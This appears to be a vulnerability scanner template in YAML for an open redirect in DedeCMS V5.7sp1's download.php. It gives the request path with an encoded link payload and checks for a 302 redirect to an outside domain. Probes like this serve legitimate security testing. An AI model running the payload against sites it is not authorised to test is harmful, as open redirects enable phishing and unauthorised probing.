product: DedeCMS
vName: DedeCMS V5.7sp1 download.php下载重定向
type: 解析漏洞
vID: [ ]
level: 3
vDesc: ''
version: V5.7 sp1
note: ''
search: { }
protocol: http
link: https://blog.csdn.net/ystyaoshengting/article/details/82734888
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /plus/download.php?open=1&link=ahr0chm6ly93d3cuzhuxednymtiuy29t
    verify:
      path: ''
      logic: and
      check:
        - status: 302
          header:
            value:
              - location
              - https://www.du1x3r12.com
            logic: and